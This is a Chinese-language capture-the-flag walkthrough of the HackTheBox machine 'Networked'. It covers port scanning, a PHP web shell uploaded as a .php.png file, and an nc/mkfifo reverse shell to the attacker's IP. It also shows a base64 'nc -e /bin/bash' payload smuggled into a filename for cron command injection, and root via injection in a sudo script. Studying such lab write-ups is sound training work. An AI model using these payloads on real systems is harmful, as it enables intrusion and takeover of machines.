HackTheBox-Networked

admin 2022年8月28日17:07:14安全文章评论7 views9368字阅读31分13秒阅读模式

title: HackTheBox-Networked author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Networked.png tags:

LInux


HackTheBox-Networked
Networked
Crazy:~/HackThebox/Networked$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.146[sudo] crazyinside 的密码:Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 02:59:55 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 80/tcp on 10.10.10.146                                    Discovered open port 22/tcp on 10.10.10.146 
Crazy:~/HackThebox/Networked$ sudo nmap -sC -sV 10.10.10.146 -p22,80 -oN Networked Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 11:02 CSTNmap scan report for 10.10.10.146Host is up (0.17s latency).
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4 (protocol 2.0)| ssh-hostkey: | 2048 2275d7a74f81a7af5266e52744b1015b (RSA)| 256 2d6328fca299c7d435b9459a4b38f9c8 (ECDSA)|_ 256 73cda05b84107da71c7c611df554cfc4 (ED25519)80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.79 secondszsh: segmentation fault sudo nmap -sC -sV 10.10.10.146 -p22,80 -oN Networked
<html><body>Hello mate, we're building the new FaceMash!</br>Help by funding us and be the new Tyler&Cameron!</br>Join us at the pool party this Sat to get a glimpse<!-- upload and gallery not yet linked --></body></html>
Crazy:~/HackThebox/Networked$ dirsearch -u http://10.10.10.146/     
_|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/10.10.10.146/-_22-08-22_11-03-55.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_11-03-55.log
Target: http://10.10.10.146/
[11:03:55] Starting: [11:04:02] 403 - 216B - /.htaccess.orig[11:04:02] 403 - 216B - /.htaccess.save[11:04:03] 403 - 218B - /.htaccess.sample[11:04:03] 403 - 216B - /.htaccess_orig[11:04:03] 403 - 217B - /.htaccess_extra[11:04:03] 403 - 214B - /.htaccessOLD[11:04:03] 403 - 214B - /.htaccessBAK[11:04:03] 403 - 214B - /.htaccess_sc[11:04:03] 403 - 215B - /.htaccessOLD2[11:04:03] 403 - 216B - /.htaccess.bak1[11:04:03] 403 - 206B - /.htm[11:04:03] 403 - 213B - /.ht_wsr.txt[11:04:03] 403 - 207B - /.html[11:04:03] 403 - 216B - /.htpasswd_test[11:04:03] 403 - 212B - /.htpasswds[11:04:03] 403 - 213B - /.httr-oauth[11:04:33] 301 - 235B - /backup -> http://10.10.10.146/backup/[11:04:33] 200 - 885B - /backup/[11:04:35] 403 - 210B - /cgi-bin/[11:04:48] 200 - 229B - /index.php[11:04:48] 200 - 229B - /index.php/login/[11:05:00] 200 - 1KB - /photos.php[11:05:16] 200 - 169B - /upload.php[11:05:16] 301 - 236B - /uploads -> http://10.10.10.146/uploads/[11:05:16] 200 - 2B - /uploads/
HackTheBox-Networked
image-20220822110511707
HackTheBox-Networked
image-20220822110802735
HackTheBox-Networked
image-20220822110820490
<?phprequire '/var/www/html/lib.php';
define("UPLOAD_DIR", "/var/www/html/uploads/");#上传路径
if( isset($_POST['submit']) ) { if (!empty($_FILES["myFile"])) { $myFile = $_FILES["myFile"];
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {#文件大小不许大于60000 echo '<pre>Invalid image file.</pre>'; displayform(); }
if ($myFile["error"] !== UPLOAD_ERR_OK) { echo "<p>An error occurred.</p>"; displayform(); exit; }
//$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"]; list ($foo,$ext) = getnameUpload($myFile["name"]); #白名单校验 $validext = array('.jpg', '.png', '.gif', '.jpeg'); $valid = false; foreach ($validext as $vext) { if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { $valid = true; } }
if (!($valid)) { echo "<p>Invalid image file</p>"; displayform(); exit; } $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;
$success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name); if (!$success) { echo "<p>Unable to save file.</p>"; exit; } echo "<p>file uploaded, refresh gallery</p>";
// set proper permissions on the new file chmod(UPLOAD_DIR . $name, 0644); }} else { displayform();}?>

在图片中插入PHP代码:

<?php echo "START<br/><br/>nnn"; system($_GET["cmd"]); echo "nnn<br/><br/>END"; ?>

命名为shell.php.png。

HackTheBox-Networked
image-20220822112351543
HackTheBox-Networked
image-20220822112425562

右键新建打开,输入cmd=id:

HackTheBox-Networked
image-20220822112457080

自己apache解析就有问题:

http://10.10.10.146/uploads/10_10_16_3.php.png?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.16.3%201337%20%3E%2Ftmp%2Ff
Crazy:~/HackThebox/Networked/backup$ nc -lvnp 1337           listening on [any] 1337 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.146] 55794sh: no job control in this shellsh-4.2$ ididuid=48(apache) gid=48(apache) groups=48(apache)sh-4.2$ python3 -c 'import pty; pty.spawn("/bin/bash")'python3 -c 'import pty; pty.spawn("/bin/bash")'sh: python3: command not foundsh-4.2$ script -qc /bin/bash /dev/nullscript -qc /bin/bash /dev/nullbash-4.2$ ls10_10_16_3.php.png  127_0_0_2.png  127_0_0_4.png127_0_0_1.png       127_0_0_3.png  index.htmlbash-4.2$
bash-4.2$ cd /homebash-4.2$ lsgulybash-4.2$ cd gultbash: cd: gult: No such file or directorybash-4.2$ cd gulybash-4.2$ lscheck_attack.php  crontab.guly  user.txtbash-4.2$ cat user.txtcat: user.txt: Permission deniedbash-4.2$ cat check_attack.php<?phprequire '/var/www/html/lib.php';$path = '/var/www/html/uploads/';$logpath = '/tmp/attack.log';$to = 'guly';$msg= '';$headers = "X-Mailer: check_attack.phprn";
$files = array();$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) { $msg=''; if ($value == 'index.html') { continue; } #echo "-------------n";
#print "check: $valuen"; list ($name,$ext) = getnameCheck($value); $check = check_ip($name,$value);
if (!($check[0])) { echo "attack!n"; # todo: attach file file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$valuen"; mail($to, $msg, $msg, $headers, "-F$value"); }}
?>bash-4.2$
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

改编一下:

exec("nohup /bin/rm -f /var/www/html/uploads/$value > /dev/null 2>&1 &");

主要是这段代码

 $check = check_ip($name,$value);
if (!($check[0])) { echo "attack!n"; # todo: attach file file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$valuen"; mail($to, $msg, $msg, $headers, "-F$value"); }}

它检测/var/www/html/uploads/下文件是否以正确的IP命名,如果不是会输出attack!,然后调用exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");去删除掉它。我可以照着这条命令把我希望的拼接一下。试了几次反弹shell会话的方法,这个可以用:

HackTheBox-Networked
image-20220822114128186
exec("nohup /bin/rm -f /var/www/html/uploads/a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh > /dev/null 2>&1 &");

然后开始找check_ip函数方法到底是如何检测的,会不会干扰命令正常运行:

function check_ip($prefix,$filename) {  //echo "prefix: $prefix - fname: $filename<br>n";  $ret = true;  if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {    $ret = false;    $msg = "4tt4ck on file ".$filename.": prefix is not a valid ip ";  } else {    $msg = $filename;  }  return array($ret,$msg);}

这个只是检测一下是否为有效IP。那我直接创建一个文件名为a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh。应该可以,我还要确保原本代码能正常执行,否则可能会出现一些意料之外的错误:

bash-4.2$ touch "a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh;b"bash-4.2$ ls10_10_16_3.php.png127_0_0_1.png127_0_0_2.png127_0_0_3.png127_0_0_4.pngtouch "a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh;b"index.htmlbash-4.2$
Crazy:~/HackThebox/Networked/backup$ nc -lvnp 1338listening on [any] 1338 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.146] 44432iduid=1000(guly) gid=1000(guly) groups=1000(guly)python3 -c 'import pty; pty.spawn("/bin/bash")'iduid=1000(guly) gid=1000(guly) groups=1000(guly)lscheck_attack.phpcrontab.gulyuser.txtcat user.txt526cfc2.........................script -qc /bin/bash /dev/null[[email protected]networked ~]$ lscheck_attack.php  crontab.guly  user.txt[[email protected]networked ~]$
[[email protected] ~]$ sudo -lMatching Defaults entries for guly on networked:    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",    secure_path=/sbin:/bin:/usr/sbin:/usr/bin
User guly may run the following commands on networked: (root) NOPASSWD: /usr/local/sbin/changename.sh[[email protected] ~]$ cat /usr/local/sbin/changename.sh#!/bin/bash -pcat > /etc/sysconfig/network-scripts/ifcfg-guly << EoFDEVICE=guly0ONBOOT=noNM_CONTROLLED=noEoF
regexp="^[a-zA-Z0-9_ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x done echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-gulydone /sbin/ifup guly0[[email protected] ~]$
[[email protected] ~]$ cat /etc/sysconfig/network-scripts/ifcfg-gulyDEVICE=guly0ONBOOT=noNM_CONTROLLED=noNAME=ps /tmp/fooPROXY_METHOD=asodihBROWSER_ONLY=asdoihBOOTPROTO=asdoih[[email protected] ~]$
[[email protected] ~]$ sudo /usr/local/sbin/changename.shinterface NAME:idinterface PROXY_METHOD:whoamiinterface BROWSER_ONLY:idinterface BOOTPROTO:idERROR     : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.[[email protected] ~]$ sudo /usr/local/sbin/changename.shinterface NAME:a idinterface PROXY_METHOD:a whoamiinterface BROWSER_ONLY:a pwdinterface BOOTPROTO:a whoamiuid=0(root) gid=0(root) groups=0(root)root/etc/sysconfig/network-scriptsrootuid=0(root) gid=0(root) groups=0(root)root/etc/sysconfig/network-scriptsrootERROR     : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.[[email protected] ~]$ sudo /usr/local/sbin/changename.shinterface NAME:a idinterface PROXY_METHOD:a /bin/bashinterface BROWSER_ONLY:a idinterface BOOTPROTO:a iduid=0(root) gid=0(root) groups=0(root)[[email protected] network-scripts]# cat /root/root.txt0a8e................................

原文始发于微信公众号(老鑫安全):HackTheBox-Networked

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日17:07:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  HackTheBox-Networked http://cn-sec.com/archives/1258729.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: